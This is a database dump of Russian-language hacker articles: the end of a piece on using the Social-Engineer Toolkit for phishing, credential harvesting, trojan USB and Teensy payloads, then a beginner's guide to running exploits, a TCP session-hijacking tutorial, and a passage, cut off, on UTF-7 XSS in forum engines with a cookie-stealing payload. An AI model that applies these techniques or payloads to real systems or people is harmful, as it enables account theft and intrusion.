флаги тут были необычные. В качестве флагов использовались: название кофе-машины в компании, название браузера, антивируса и их версии, и даже то, кто обрабатывает информацию в шредере и многое другое, но никакой финансовой информации, паролей пользователей и персональных данных, так как целевые компании были реальными, а не вымышленными. Но самым дорогим флагом было заставить сотрудника компании посетить определенный URL. Стоит отметить, что среди компаний были такие монстры, как Google, BP, McAfee, Symantec, Shell, Microsoft, Oracle, Cisco, Apple и Walmart. Как сказали организаторы, соревнование прошло хорошо, даже очень хорошо :).<br />Хочется также упомянуть компанию Digital Defense, которая даже разослала всем своим клиентам предупредительное письмо с заголовком "Warning Regarding DEF CON 18 Social Engineering Contest", в котором призывала их быть очень бдительными на время данного мероприятия.<br /> Web attack vector<br /><br />Данный вектор атаки предоставляет нам более интересные, изощренные и разноплановые способы атаки пользователей, чем первый. Говоря о способе через веб, можно выделить и общую черту (с единственным исключением), проходящую через атаки этого типа — использование поддельной веб-страницы на автоматически поднимаемом веб-сервере. Хотя современные браузеры и стараются бороться против поддельных сайтов, окончательное решение о том, доверять или не доверять сайту, принимает человек, а порой просто подводит человеческая невнимательность.<br /><br />Как упоминалось ранее, SET прекрасно работает в связке с ettercap, и чтобы пользователь не заметил подвоха в адресной строке, можно применить ARP-spoofing. В таком случае жертва вместо оригинального сайта попадает на наш поддельный сайт. Естественно, жертва должна находиться в нашей же подсети.<br /><br />Также заманить пользователя на наш сайт можно с помощью XSS, email-рассылки, звонка из техподдержки провайдера... В принципе, здесь дело ограничивается лишь твоей фантазией. Говоря о почте, стоит вспомнить о первом векторе атаки, который может прекрасно работать и через веб. Для этого при рассылке в текст письма добавляем URL, предварительно сжатый с помощью сервиса www.bit.ly (или ему подобным). Естественно, вектор атаки через почту не предоставляет возможности отправки нормального файла, но никто не мешает после создания файла подменить его на нормальный в /pentest/exploits/SET/src/program_junk/<name_file>.pdf. Так как данный вектор сводится к созданию подложного сайта и заманиванию на него жертвы, то SET берет на себя первую часть плана и справляется с ней на "отлично", предоставляя нам три варианта создания такого типа сайтов:<br />Заготовки Gmail, Google, Facebook, Twitter и Java Required<br />Клонирование сайта<br />Собственный сайт<br /><br />Среди сайтов-заготовок, наверное, стоит остановиться только на "Java Required", при попадании на который появляется страничка с сообщением, что для ее просмотра необходима Java, и подробная инструкция о том, как ее установить. Лучше всего данный шаблон выбирать при проведении атаки Java Applet, но об этом чуть позже.<br /><br />Второй режим самый лакомый — это полное клонирование веб-страницы любого сайта. Для этого достаточно лишь сообщить toolkit’у необходимый URL, а дальше — дело техники. Через несколько секунд мы уже имеем копию любой веб-страницы. И последний режим дает возможность поднять свой собственный сайт, указав лишь директорию на диске, где он расположен. Здесь можно развернуть как какой-нибудь большой сайт, так и просто страницу с ошибками "404", "Идут профилактические работы", "Идет загрузка ...", "Содержание данного сайта несовместимо с вашим браузером, попробуйте открыть ссылку с помощью IE". Главное, чтобы жертва ничего не заподозрила и как можно дольше пробыла на сайте.<br /><br />Первое, что мы видим, зайдя в пункт web-attack — это The Java Applet атака. Java Applet спуфит поддельный Java Certificate, и, если цель принимает его, на ней запускается metasploit payload. Самым главным достоинством данного метода является то, что нас не интересует, какой ОС и каким браузером пользуется пользователь, главное, чтобы у него на машине стояла Java. За такой замечательный Java Applet мы должны сказать спасибо Thomas Werth.<br /><br />Ну и, конечно, эксплуатацию уязвимостей браузеров никто не отменял, и для этого есть пункт "The Metasploit Browser Exploit Method". Здесь SET на созданную нами страницу помещает эксплойт, который будет ждать своего часа. Так как большинство новых эксплойтов пробивают к IE (не факт, что жертва им пользуется), то можно, применив социальную инженерию, заставить юзера зайти по ссылке именно с помощью IE — как показывает практика, это вполне возможно. Метод "Credential Harvester" очень прост как в реализации, так и в применении, ведь его задача заключается в сборе всей информации, которую ушастый юзер ввел на странице подготовленного нами сайта. Так что с его помощью очень просто слить аутентификационные данные ничего не подозревающего пользователя.<br /><br />metasploit-fakeUpdate<br /><br />Хакер под ником g0tmi1k написал небольшой, но очень интересный bash-скрипт — metasploit-fakeUpdate, который позволяет с помощью поддельного окна обновления, говорящем о необходимости установить patch для закрытия критической уязвимости (есть поддержка Linux, OSX, Windows), протроянить жертву. Для этого скрипт автоматически поднимает DHCP и веб-сервер, запускает DNSSpoof и ARPSPoof, из-за чего жертва никак не может попасть на желаемый сайт, а постоянно видит поддельное окно с просьбой установить патч. Нам лишь остается ждать, когда жертва падет под нашим натиском и установит "обновление". Ну, а затем наш "патч" запускает выбранную нагрузку. На выходе мы можем получить консоль meterpreter и SBD (Secure BackDoor) или VNC, ну, или, собственно, прописанный backdoor. Также есть возможность указать необходимый sniffer из набора dnsiff, чтобы смотреть, что делает жертва. Как можно заметить, весь набор данного софта уже предустановлен во всеми любимом BackTrack.<br /><br />У многих людей при серфинге интернета открыто много вкладок: для часто посещаемых сайтов, чтобы что-то просмотреть в будущем и т.д. С большим количеством открытых вкладок и с течением времени достаточно трудно вспомнить, что открыл сам, а что скинули посмотреть по мессенджеру ICQ, Skype, Jabber или e-mail. Как раз на это и рассчитана Tabnabbing-атака. Данная атака формирует специальную страницу, на которой первоначально красуется надпись "Please wait while the site loads...", а затем, когда пользователю надоедает ждать загрузки страницы, и он переключается на другую вкладку в браузере, наша подготовленная страница изменит свой вид на вид страницы от популярного почтового сервиса, куда мы хотим позаимствовать аутентификационные данные. Уже в следующий раз, когда жертва будет просматривать свои вкладки, она наткнется уже на сильно знакомый ему интерфейс и, возможно, захочет проверить свою почту в данном окне (не набивать же адрес заново в новом). А дальше наша страничка работает аналогично методу Credential Harvester. Да, и начиная с версии SET 0.6.1, стало возможно использовать SSL (как самоподписанный, так и заранее купленный сертификат). Так что атака может стать еще более мощной и красивой.<br /><br />Метод "Man Left in the Middle Attack" был внесен в toolkit человеком с ником Кос и использует HTTP REFERER для сбора данных из полей, которые пользователь заполнил на сайте. Этот метод является единственным, для которого можно не создавать поддельный сайт, но необходимо наличие уязвимости типа XSS на реальном сайте, данные с которого нас интересуют, для ее проведения. Получается, что мы просто используем XSS на реальном сайте в режиме Credential Harvester и получаем нужный нам profit.<br /> CD/DVD/USB attack vector<br /><br />Далеко не у всех в настройках отключена автозагрузка, да и LNK-эксплойт во всю свирепствует, так что данное направление проникновения в систему до сих пор представляет определенный интерес. SET позволяет создать необходимый материал для такой атаки. Для этого необходимо воспользоваться пунктом меню Infectious Media Generator, который любезно поинтересуется о твоих предпочтениях в payload, Encoder, количестве итераций кодирования нагрузки (для AV bypass) и порта для reverse-connect. В результате в корневой папке SET появится папка autorun с двумя файлами: program.exe (наш payload) и autorun.inf, запускающий program.exe. Записываем полученный материал на CD/DVD/USB и подсовываем жертве.<br />Teensy USB hid attack vector<br /><br />Благодаря IronGeek и WinFang в SET появился такой изощренный вектор атаки, как Teensy USB HID (human interface device). Правда, для этого придется немного раскошелиться, но это того стоит. Teensy — это очень маленькое программируемое устройство с mini-USB интерфейсом. Teensy USB на борту имеет AVR-процессор с частотой 16 МГц, флеш-память 32-128 Кб, RAM-память 2,5-8 Кб и стоит этот малыш $18-27, в зависимости от модели.<br /> Прелесть данного устройства заключается в том, что оно является программируемым и определяется в системе как USB-клавиатура, что как следствие, позволяет обойти любой запрет на автозагрузку и т.д. Оно также не нуждается в специальных драйверах и, имея очень маленький размер, может быть незаметно установлено на компьютер, пока хозяин машины отвлекся. И это еще не все — устройство обладает таймером и датчиком, что дает возможность запуска начинки при определенных условиях. Единственным недостатком является то, что оно определяется в системе немного дольше, чем обычное USB U3 устройство. В общем, дело осталось за малым — залить нужную нам нагрузку в pde-формате на Teensy. Вот тут как раз нам и поможет SET, он генерирует нашу нагрузку в teensy.pde, который затем с помощью Arduino IDE и Teensy Loader по USB заливается на устройство. Стоит отметить, что в качестве нагрузки можно использовать Powershell HTTP GET MSF, WSCRIPT HTTP GET MSF и Powershell based Reverse Shell. Если данного набора тебе недостаточно, то можно написать свой payload на C или воспользоваться Arduino IDE, которое понимает USB HID out of the box! Теперь в манере агента 007 (никаких убийств, только незаметность) получаем физический доступ к системе и незаметно, элегантно own'им ее.<br /> <br />Conclusion:<br />Как видишь, социальная инженерия набирает новые обороты — благодаря ей можно добиться того, чего не сможет ни один эксплойт. А с привлечением автоматизированных средств это становится сделать намного более просто и массово, так что пробив растет. Растет и количество пользователей ПК, а вот компьютерная грамотность — только падает. И это только начало, мой друг, это только начало...<br /><br />Warning:<br />Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несет!","Социальная реальность: SET — лучший набор гениального хакера","gazeta/img_549682.png","1373183517","3");
INSERT INTO gazeta_article VALUES("71","22","Многих людей интересует вопрос:<br />«Что же такое эксплоит»? В этой<br />статье я постараюсь дать<br />максимально развернутый ответ на<br />него. Итак:<br />Виды эксплоитов - Эксплоит может представлять из<br />себя одиночный файл, который<br />необходимо либо сразу запустить<br />либо предварительно<br />компилировать.<br />- Эксплоит может представлять из себя архив, чаще с расширениями .tar<br />или .tar.gz, потому как большинство<br />из них пишутся под UNIX системы. В<br />этих архивах может лежать что<br />угодно:<br />* те же .pl файлы * скрипт или исходник на C, Java? etc<br />* просто описание "хитрого<br />обращения"<br />* etc<br />Алгоритм действия<br />* Сканируем хост (желательно сканировать с использованием nmap)<br />* Смотрим открытые порты и что на<br />них висит<br />* Телнетимся на открытые порты и<br />узнаем версии демонов<br />* Находим дырявый демон * Ищем эксплоит<br />* Засылаем его на shell-account в лине<br />* Компилируем его<br />* Запускаем эксплоит<br />Поиск эксплоита<br />Предположим, что мы узнали, что какой-то демон дырявый. Срочно<br />бежим в bugtrack's и архивы<br />уязвимостей и находим эксплоит.<br />Ищем сплоит либо по версии демона<br />либо по версии операционной<br />системы. shell-account<br />Варианты:<br />1. У вас есть шелл (не<br />рассматривается - переходите к<br />следующему заголовку)<br />2. У вас нет шелла и вы хотите его поиметь<br />Действия:<br />- Можно использовать халявный<br />шелл (однако у них отключены многие нужные вещи Well) 3. У вас есть собственный UNIX<br />(переходи к следующему заголовку)<br />Компиляция<br />Допустим, мы нашли нужный нам<br />сплоит на C. Большинство<br />эксплоитов пишутся именно на этом языке программирования.<br />gcc file.c -o file - Скомпилировать C<br />код и получить при выходе бинарник<br />file<br />Если у тебя архив, то раскрываем: tar<br />-xvzf pack.tgz cd [имя каталога]<br />./configure<br />make<br />make install<br />Возможно, придется почитать<br />Readme File перед установкой, если это специфичный эксплоит.<br />Запуск эксплоита<br />Если эксплоит на Perl, тогда для<br />запуска используется команда<br />perl exploit.pl [parametersIflags]<br />Если эксплоит на C, то $./sploit [parameters]<br />Каждый эксплоит подразумевает<br />вставку своих параметров, о<br />назначении которых обычно<br />сообщает сам при запуске.<br />Проблеммы на халявных шеллах На бесплатных шеллах часто<br />встречаются следующие проблеммы:<br />- недостаточно прав<br />- не возможно подключить .h<br />библиотеки (которые используют все<br />эксплоиты) Появление этих проблем не<br />удивительно. Если бы<br />администраторы разрешили все<br />функции шелла, то тогда это был бы<br />не бесплатный сервис для знакомства<br />с UNIX системой а плацдарм для массированных атак на сервера.<br />Надеюсь, теперь проблем у вас с этим<br />не будет.<br />Несколько пояснений:<br />1. Что такое shell?<br />Дословно shell переводится как "оболочка". Это программа, которая<br />принимает команды юзера из<br />командной строки, преобразует их в<br />понятную для операционки форму и<br />выводит ответ операционки в понятной для юзера форме Well. Другое название shell - командный<br />интерпретатор. Вот несколько<br />наиболее юзабельных shell'ов: bash,<br />sh, csh, tcsh, psh. Отличаются они тем,<br />что у каждой shell свой язык для<br />написания скриптов (у родственных шеллов они почти одинаковые, как у<br />bash и sh).<br />Еще они отличаются по<br />функциональности: некоторые<br />позволяют редактировать вид<br />командной строки. Почти у каждого шелла есть свои встроенные<br />переменные. Если не знаешь, какой у<br />тебя шелл, вводи команду echo $<br />SHELL. Если хочешь поменять свой<br />дефолтовый шелл, вводи команду<br />chsh. 2. Что такое демон (daemon)?<br />Демоном называется программа,<br />работающая в фоновом режиме<br />(background) и не имеющая<br />контрольного терминала.<br />Резидентка, короче :0)","Что такое эксплоит и с чем его<br />едят","gazeta/img_435662.png","1373273457","4");
INSERT INTO gazeta_article VALUES("79","21","Доброго времени суток. На этот раз предлагаю Вам обсудить довольно сложную тему, а именно как войти в систему не зная пароля и даже имени пользователя. Итак приступим. <br />Многие слышали выражения типа "Зателнеться по такому-то порту" или "Залей сниффер по ФТП-шнику" и т.п. И многие из Вас телнетились или заходили по ФТП на сервер. Ну и что там видно после соединения? Да ничего хорошего. Удаленная машина упорно талдычит "введи пароль". Ну а где нам взять пароль, если мы впервые на этом сервере? Серьезная проблема, не так-ли? Ладно, давайте ее и решать.<br />Есть предложение воспользоваться вот какой возможностью. А почему бы не переждать, пока настоящий пользователь не зарегистрируется в системе и потом не перехватить его сессию. Заманчиво, правда?<br /> Теория.<br />Протокол TCP (Transmission Control Protocol) является одним из базовых протоколов транспортного уровня сети Internet. Работа с этим протоколом подразумевает создание непосредственного виртуального соединения, контроль ошибок, повторную пересылку поврежденных пакетов, четкую последовательность пересылки самих пакетов и разрыв соединения в конце сеанса. Нам интересен этот протокол именно потому, что такие известные протоколы прикладного уровня как FTP и TELNET реализованы на его базе. Для опознавания TCP-пакета в его заголовке существеет два 32-разрядных идентификатора, они же в свою очередь служат и счетчиками пакетов. Я имею в виду Sequence Number и Acknowledgment Number. Еще одно немаловажное поле - Control Bits.<br /> Это поле размером 6 бит может содержать следующие командные биты (слева направо):<br /> URG: Urgent Pointer field significant<br /> ACK: Acknowledgment field significant<br /> PSH: Push Function<br /> RST: Reset the connection<br /> SYN: Synchronize sequence numbers<br /> FIN: No more data from sender<br />Ну что ж, в основную теорию, надеюсь, въехали, пойдем далее. Рассмотрим как происходит процесс соединения по протоколу TCP.<br />Как происходит ЭТО.<br />Допустим компьютеру "Клиент" (в интернете каждый компьютер умные люди зовут хостом, а чем мы хуже этих людей?) необходимо создать соединение с хостом "Сервер". Это соединение происходит в 3 этапа:<br /> Первым делом клиент как бы здоровается и посылает пакет серверу с установленным битом SYN (synchronize sequence number), а в поле Sequence Number установлено начальное 32-битное значение (обозначим его как ISSкл) (Initial Sequence Number).<br /> Сервер тоже здоровается с клиентом (он тоже культурный) и посылает свой пакет, в котором отмечены бит SYN и бит ACK. В поле Sequence Number сервер устанавливает свое начальное значение - ISSсерв. Но это еще не все. Тут сервер начинает хитрить и в поле Acknowledgment Number ставит значение ISSкл, полученное в первом пакете от хоста "Клиент" да еще и увеличенное на единицу.<br /> Но клиент тоже не лыком шит и тоже отвечает хитростью: он посылает свой пакет, где установлен бит ACK; поле Sequence Number содержит ISSкл + 1, а поле Acknowledgment Number содержит значение ISSсер + 1.<br /> Тут процесс братания хостов и заканчивается. Виртуальное соединение считается установленным.<br /> Повторим схемотично, что же происходило:<br /> Клиент - > Сервер: SYN, ISSкл<br /> Сервер - > Клиент: SYN, ACK, ISSсер, ACK(ISSкл+1)<br /> Клиент - > Сервер: ACK, ISSкл+1, ACK(ISSсер+1)<br />Вот теперь, отрекомендовавшись у Сервера, Клиент может преспокойно отсылать свои пакеты данных, не забывая при этом менять поля ACK, ISSкл+1, ACK(ISSсер+1) и DATA.<br />Разбор полета.<br />Из предыдущего раздела мы видим, что на этапе установки соединения (когда хосты здороваются) опознавание пакетов осуществляется только по Sequence Number и Acknowledgment Number. Тут сразу становится ясно, что для формирования ложного TCP-пакета нам достаточно знать текущие значения идентификаторов для данного соединения - ISSкл и ISSсер. Усугубляет картину еще и то, что FTP и TELNET вовсе не проверяют подлинность пакетов, полагая, что это сделает за них транспортный уровень. Отсюда вывод: внедрившись в процесс передачи данных на транспортном уровне можно послать пакет с любого хоста в сети Internet не зависимо от потокола (TELNET или FTP) от имени одного из участников данного соединения (например, от имени клиента), и данный пакет будет воспринят как верный! К тому же, постольку поскольку FTP и TELNET не проверяют IP адрес отправителя, то ответ на ложный пакет придет по указанному в нем адресу. Бедный же хозяин пакетов (Клиент) попросту отвалится из-за рассогласования счетчиков (сервер нас уже посчитал).<br /> Дядь, дай десять копеек.<br />Ну что ж осталось дело за малым. Надо рассчитать ISSкл и ISSсер, а также предсказать динамику их изменения. Это самая сложная задача, но мы трудностей не боимся. (Он сказал "Поехали!" и взмахнул рукой).<br />Случай 1 (простой).<br /> Предположим, что мы находимся в том же сегменте сети, что и атакуемый хост. Дело за малым. Ставим сниффер, направляем весь трафик через свой хост и смотрим за клиентами, подключающимися к серверу. Конечно же нас интересуют только пакеты со значениями ISSкл и ISSсер (можно даже не интересоваться содержанием поля DATA, т.е. анализировать только заголовки). Итак. Собираем информацию, ищем зависимость, составляем формулу и в путь.<br /> Случай второй (сложный).<br />Предположим, мы находимся в другом сегменте сети и проанализировать трафик нам не удастся.<br />Для начала нам надо определить ISN - Initial Sequence Number, т.е. как ОС формирует начальное значение. По документации протокола TCP (RFC 793) рекомендуется увеличивать значение этого 32-битного счетчика на 1 каждые 4 микросекунды, но на практике это далеко не так. Например, в Linux 1.2.8 это значение вычисляется по такому закону:<br />ISN=mcsec + 1000000 sec, где mcsec - время в микросекундах;<br /> sec - текущее время в секундах, причем отсчет его идет от 1970 года.<br />в Windows NT 4.0:<br />ISN=10 msec, где msec - текущее время в миллисекундах.<br />ОК, На этом и сговоримся. Закон вычисления ISN зависит от времени и представляет функцию<br />ISN=F(mсsec)<br />Вид же самой функции F можно получить проанализировав исходный код ядра. Тут Вы сразу закричите: "Да ты гонишь, где же достать исходники Windows?!" Да, трудновато. Придется импровизировать.<br /> Представим ОС "черным яциком" и проведем серию тестов запрос-ответ, причем фиксируя время между запросом и ответом на него, а также время между запросами. (Проще говоря, прикинемся обезьяной с часами, и будем просить соединения у сервера, записывая изменения ISN во времени).<br /> В результате получится такая таблица значений<br /> ISN(1) - T(1)<br /> ISN(2) - T(2)<br /> ISN(3) - T(3)<br /> ...<br /> ...<br /> ...<br />ISN(N) - T(N)<br />Здесь ISN (i) - значение ISN, полученное в момент времени i, а T(i) - время от начела эксперимента (время начала возьмем за 0).<br /> Проанализировав результаты наблюдений, можно составить функцию<br />ISN(t)=F(t)<br />С ее помощью уже можно получив ответ, предсказать значение ISN через определенный промежуток времени.<br /> Сразу оговорюсь. Не обязательно нападать с подобными тестами на интересующий нас хост. Можно просто найти такой жи тип ОС, что и там и протестировать ее, а результат (полученную функцию) записать и применить уже в деле.<br /> Вот, собственно, и все. Осталось дождаться, когда пользователь зарегистрируется в системе, введет логинпароль и начнет работу. Какие наши действия? Прогнозируем нимер ISN, создаем пакет с заполненными полями ACK, ISSкл+1, ACK(ISSсер+1) и DATA и, если повезет захватываем сессию. Если не повезло, немного меняем ISSкл вместе с ACK(ISSсер+1) и за старое. Рано или поздно значения будут верными. Тут нам откроются такие возможности! Этими средствами можно даже захватить сеанс полозователя root. Представить страшно.<br /> Вот таким далеко не простым способом можно проникнуть в любую систему. Желаю удачи!","Как стать участником чужого TCP соединения (hacking) <br />Введение.","gazeta/img_240428.png","1373278898","3");
INSERT INTO gazeta_article VALUES("74","22","Автор: Algol<br />Как известно, основной метод борьбы<br />с XSS - это фильтрация специальных<br />символов во входном или выходном<br />потоке. При этом традиционно<br />фильтруются символы < >, а также " '<br />& %. Все эти символы имеют ASCII код меньший 128, и поэтому, в<br />большинстве кодировок кодируются<br />одним байтом, значение которого<br />совпадает с ASCII-кодом символа.<br />Но это справедливо не для всех<br />кодировок. Рассмотрим такую кодировку, как UTF-7. Эта кодировка<br />создавалась для передачи данныx в<br />системах, которые игнорируют<br />старший бит в байте символа (в<br />основном это почтовые сервисы). В<br />этой кодировке используются символы + - ! а также буквы<br />латинского алфавита и цифры.<br />Остальные символы кодируются<br />цепочками вида +XXX- где XXX -<br />некоторая последовательность<br />латинских букв. Так, например, символ < кодируется как +ADw-,<br />символ > как +AD4-.<br />Поскольку, знак + фактически<br />никогда не фильтруется, то<br />произвольный текст (в том числе и<br />HTML-код) в кодировке UTF-7 беспрепятственно проходит сквозь<br />серверные скрипты.<br />Попадая в пользовательский браузер,<br />этот текст, при определеных<br />условиях, может быть расшифрован<br />браузером и восприняться как HTML- код, что влечет за собой<br />возможность проведения XSS атаки.<br />Если атакующему удастся "убедить"<br />браузер клиента в том, что страница<br />представлена в кодировке UTF-7, то<br />XSS можно считать состоявшимся. Рассмотрим условия, при которых<br />браузер может воспринять текст как<br />UTF-7 кодировку. Все дальнейшие<br />примеры приводятся для IE6. Другие<br />барузеры наверняка используют<br />другую систему декодирования, и поэтому приведенный код, почти<br />наверняка, в них работать не будет.<br />Рассмотрим механизм определения<br />браузером кодировки загруженной<br />страницы. Прежде всего, браузер<br />анализирует поле Content-Type из заголовка HTTP ответа сервера. Если<br />это поле содержит информацию о<br />кодировке страницы, то браузер<br />именно ее и использует для<br />расшифровки текста. Например,<br />такой заголовок Content-Type: text/ html; charset=windows-1251<br />свидетельствует о том, что<br />кодировка страницы - win-1251.<br />Далее, если в теле HTML страницы<br />присутствует тег <meta>, в котором<br />указана кодировка страницы, то браузер изменяет текущую<br />кодировку на указанную. Это<br />происходит даже если в заголовке<br />HTTP была указана другая кодировка.<br />При этом, даже та часть страницы,<br />которая уже проинтерпретировалась (до тега <meta>) перекодируется в<br />соответствии с новой кодировкой.<br />Несмотря на то, что преимущество<br />тега <meta> над полем Content-Type<br />явно не оговорено в стандартах<br />языка, тем не менее IE поступает именно так. Например тег <meta http-<br />equiv="Content-Type" content="text/<br />html; charset=ISO8859-1"> заставляет<br />рассматривать страницу в кодировке<br />ISO8859-1, даже если в загловке HTTP<br />было указано Content-Type: text/html; charset=windows-1251.<br />Если в теле страницы, тег <meta http-<br />equiv="Content-Type"> встречается<br />несколько раз, то во внимание<br />принимается только первый из них.<br />Остальные игнорируются (пример). В дальнейшем пользователь может<br />поменять кодировку уже<br />загруженной страницы,<br />воспользовавшись пунктом Вид/<br />Кодировка главного меню браузера.<br />Теперь рассмотрим поведение браузера, если ни в заголовке HTTP,<br />ни в метатегах, кодировка не<br />указана. Если в браузере выствлен<br />флажок Автовыбор кодировки (Вид/<br />Кодировка/Автовыбор), то браузер<br />пытается сам определить кодировку страницы. В процессе загрузки, он<br />анализирует цепочки символов, и<br />если встречается цепочка в известной<br />браузеру кодировке, то он считает<br />что вся страница представлена<br />именно в этой кодировке. В процессе определения кодировки,<br />просматривается не весь текст HTML а<br />только содержимое тегов. Значения<br />атрибутов тегов - не<br />просматриваются (либо<br />просмтривается, но позже, после загрузки всего текста). То есть такую<br />страницу <font>Мама мыла раму</<br />font> браузер распознает как<br />windows-1251, а вот такую <font<br />title= "Мама мыла раму">Happy<br />birthday to you</font> - нет. Кроме того, просматриваются только<br />первые 4 килобайта HTML-кода.<br />Остальная часть на кодировку<br />влияния не оказывает и будет<br />интерпретирована в той кодировке,<br />которая была определена по первым четырем килобайтам.<br />Пример автоматического<br />распознавания кодировки UTF-7<br />приведен здесь. Следует отметить, что распознавание<br />кодировки, парсинг HTML тегов, и<br />выполнение встретившихся скриптов<br />происходит одновременно. Таким<br />образом, если кодировка еще не<br />определена, и встречается скрипт, зашифрованный в некоторой<br />кодировке, например UTF-7, то<br />браузер считает, что кодировка<br />документа UTF-7, расшифровывает и<br />выполняет скрипт, и только затем<br />парсит оставшуюся часть документа. При этом, даже если впоследствии<br />окажется, что кодировка иная<br />(например встретился метатег с<br />явным указанием кодировки, или<br />были обнаружены русские буквы),<br />скрипт все равно выполнится (пример). Практические аспекты В качестве примеров, рассмотрим<br />несколько форумных движков на<br />предмет подверженности XSS атакам<br />с помощью кодировки UTF-7.<br />Ниже приведено начало HTML-<br />страницы одного из самых распространенных в мире форумов -<br />vBulletin(версия 3.0.7, пример взят с<br />одного из известных зарубежных<br />сайтов): < ! D O C T Y P E h t m l P U B L I C " - / / W3 C / / D T D X H T M L 1 . 0 T r a n s i t i o n a l / / E N " " h t t p : / / www . w3 . o r g / T R / x h t m l 1 / D T D / x h t m l 1 - t r a n s i t i o n a l . d t d " > < h t m l d i r = " l t r " l a n g = " e n " > < h e a d > <me t a n ame = " d e s c r i p t i o n " c o n t e n t = " P o s t y o u r q u e s t i o n a b o u t i n s t a l l i n g o r u p g r a d i n g t o v B u l l e t i n 3 . B e s u r e t o s e a r c h , a n d c h e c k t h e i n s t a l l a t i o n d o c s b e f o r e y o u p o s t ! " / > < t i t l e > v B u l l e t i n C ommu n i t y F o r um - v B u l l e t i n 3 I n s t a l l a t i o n a n d U p g r a d e s < / t i t l e > <me t a h t t p - e q u i v = " C o n t e n t - T y p e " c o n t e n t = " t e x t / h t m l ; c h a r s e t = I S O - 8 8 5 9 - 1 " / > <me t a n ame = " g e n e r a t o r " c o n t e n t = " v B u l l e t i n 3 . 0 . 7 " / > <me t a n ame = " k e y wo r d s " c o n t e n t = " v b u l l e t i n , f o r um , b b s , d i s c u s s i o n , j e l s o f t , b u l l e t i n b o a r d " / > <me t a n ame = " d e s c r i p t i o n " c o n t e n t = " T h i s i s a d i s c u s s i o n f o r um p owe r e d b y v B u l l e t i n . T o f i n d o u t a b o u t v B u l l e t i n , g o t o h t t p : / / www . s ome s i t e . c om/ . " / > . . . . Заголовок HTTP Content-Type данного<br />сайта не устанавливал кодировку<br />(что, в общем-то, характерно для<br />англоязычных сайтов), что делалает<br />его потенциально уязвимым к<br />описываемой атаке. Как видим, в странице указан метатег<br />с кодировкой ISO-8859-1, что<br />однозначно определяет кодировку<br />страницы. Однако обратим внимание<br />на то, что тег <title>, куда заносится<br />тема текущего топика, находится перед метатегом (отмечено синим). А это значит, учитывая описанные<br />особенности парсинга, что если в тег<br />title будет внедрен скрипт в<br />кодировке UTF-7, то он будет<br />раскодирован и выполнен. Таким<br />образом, для проведения XSS атаки, достаточно создать в форуме тему,<br />название которой будет<br />зашифровано в кодировке UTF-7 и<br />содержать вредоносный скрипт.<br />Для корректного внедрения скрипта,<br />нужно закрыть тег <title>, а затем внедрить тег <script>. В целом,<br />внедряемый эксплойт может<br />выглядеть так: </title><script>alert (document.cookie);</script>, что в кодировке UTF-7 выглядит<br />следующим образом: +ADw-/title+AD4APA-script+AD4-alert<br />(document.cookie)+ADsAPA-/script<br />+AD4- Как видим, эта строка не содержит ни<br />одного фильтруемого символа, и без<br />проблем может быть использована<br />для внедрения в форум. В результате<br />создания темы с таким именем, тег<br /><title> примет вид: <title>vBulletin Community Forum -<br />+ADw-/title+AD4APA-script+AD4-alert<br />(document.cookie)+ADsAPA-/script<br />+AD4-</title> Результирующая HTML-страница<br />созданной темы можно посмотреть на примере (еще раз обращу внимание, что для срабатывания эксплойта,<br />страница должна просматриваться в<br />IE с включенным режимом<br />автоопределения кодировки). Как<br />видим, скрипт действительно<br />срабатывает, и может быть использован для отправки на CGI-<br />сниффер куков любого<br />пользователя, просматривающего<br />созданную тему.<br />Кроме того, внедренный HTML-текст<br />может содержать любые теги, что позволяет не только отправить куки<br />на сайт атакующего, но и скрыть<br />факт внедрения вредоносного<br />скрипта на страницу. Например,<br />внедрение такой строки +ADw-/title +AD4APA-script+AD4-alert<br />(document.cookie)+ADsAPA-/script<br />+AD4-+ADw-comment+AD4- делает текст, идущий после строки,<br />содержимым тега <comment>, что<br />сделает страницу просто невидимой<br />(пример ). Примечательно еще и то, что в таком случае, вся страница<br />оказывается в кодировке UTF-7,<br />поскольку метатег, определяющий<br />истинную кодировку страницы,<br />оказывается внутри комментария, и,<br />естественно, не обрабатывается. Таким образом, при постинге<br />сообщений в данную ветку форума,<br />можно вставлять произвольный<br />HTML-текст в формате UTF-7, и этот<br />текст действительно будет парсится<br />как HTML (пример). Описанная уязвимость характерна не<br />только для vBulletin 3.*, но и<br />практически для всех<br />распространенных форумных<br />движков, например vBulletin 2.*, IPB<br />1.*, IPB 2.*, Phorum, и других. Во всех этих движках, тема ветви форума<br />вставляется в тег <title>, а сам тег<br />titleидет перед метатегом кодировки.<br />Более того, многие англоязычные<br />версии форумов вообще не<br />устанавливают ни заголовок HTTP Content-Type, ни метатег <meta http-<br />equiv="Content-Type">, видимо<br />надеясь на то, что латинские буквы<br />нормально отобразятся в любой<br />кодировке. В результате - они все<br />подвержены данной уязвимости. Единственное условие срабатывания<br />для них XSS атаки - это подходящий<br />тип и настройки пользовательского<br />браузера ( IE + автовыбор<br />кодировки ).<br />Исключение тут составляет phpBB, который не подвержен данной<br />уязвимости, поскольку, видимо<br />случайно, тег <meta http-<br />equiv="Content-Type"> предшествует<br />тегу <title>: . . . . <me t a h t t p - e q u i v = " e x p i r e s " c o n t e n t = " 0 " > <me t a n ame = " p a g e - t y p e " c o n t e n t = " S o f t wa r e - D own l o a d " > <me t a n ame = " r o b o t s " c o n t e n t = " I N D E X , F O L L O W" > <me t a h t t p - e q u i v = " C o n t e n t - T y p e " c o n t e n t = " t e x t / h t m l ; c h a r s e t = i s o - 8 8 5 9 - 1 " > < t i t l e >M y S Q L P r o b l em : : p h p B B . d e < / t i t l e > < l i n k r e l = " s t y l e s h e e t " h r e f = " / c s s . c s s " t y p e = " t e x t / c s s " > < s t y l e t y p e = " t e x t / c s s " > . . . . Возможная область действия данной<br />атаки, естественно, не<br />ограничивается форумами. Ведь<br />аналогичные эксплоиты могут быть<br />внедрены практически в любые<br />динамически обновляемые страницы. Это и чаты и BBS, и почтовые сервисы,<br />гостевые книги, блоги, он-лайн<br />журналы и т.д. А ведь подавляющее<br />число этих сервисов никак не<br />фильтруют символы UTF-7, и<br />фактически допускают свободное внедрение XSS в этой кодировке.<br />В заключение, хотелось бы<br />остановиться на подверженности<br />описанной уязвимости русскоязычных<br />сайтов . Как ни странно, но они более<br />защищены от атаки, чем англоязычные. Во-первых потому, что<br />русскоязычные сайты (да и вообще<br />сайты, использующие национальные<br />кодировки) гораздо чаще используют<br />задание кодировки непосредственно<br />на сервере, и передают ее через HTTP Content-Type, что делает атаку<br />невозможной. И кроме того,<br />особенности парсинга HTML не дают<br 